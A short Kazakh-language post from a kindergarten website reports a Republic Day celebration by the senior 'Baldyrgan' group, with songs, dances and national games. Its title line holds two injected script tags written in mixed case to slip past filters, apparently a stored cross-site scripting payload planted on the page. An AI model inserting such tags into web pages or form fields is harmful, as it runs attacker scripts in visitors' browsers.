ересек "Балдырған" тобында "25 Қазан- Республика күні!" атты мерекелік іс -шара<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.10.2024

Республика күні - бұл еліміздің мемлекеттілігі жолындағы алғашқы тарихи қадам.

1990 жылғы 25 қазанда Қазақ КСР Жоғарғы Кеңесі тәуелсіз Қазақстанның бірінші құқықтық құжаты - Республиканың егемендігі туралы декларацияны қабылдап, Қазақстанның тәуелсіз мемлекет ретіндегі саяси-құқықтық негізін жариялады.

"Ақбота" бөбекжайындағы ересек "Балдырған" тобының тәрбиешісі Мукажанова Асель Амангельдиевнаның ұйымдастыруымен "25 Қазан- Республика күні!" атты мерекелік іс -шара өткізді. Мерекелік іс шарада ҚР-ның Гимні және "Тәуелсіздік ел ұраны" әнін балалар орындады. Топтың ұлдары "Жаса, Қазақстан", ал қыздар "Торсық" биін биледі. Ұлттық ойын – тәрбиенің бастауы,-дей отырып, ұлттық қол күрес пен асық ату ойындарын  балалар қызығушылықпен ойнады. Мерекелік іс-шараның мақсаты бойынша балаларға қазақ халқының және Қазақстанның басқа да халықтарының өзіндік мәдениетін, дәстүрлерін, тілін жаңғырту және дамыту, ұлттық бірегейлікті нығайту болып табылды.

Просмотров: 534


Пікір қосу



Деректерді қолтаңбаға қосу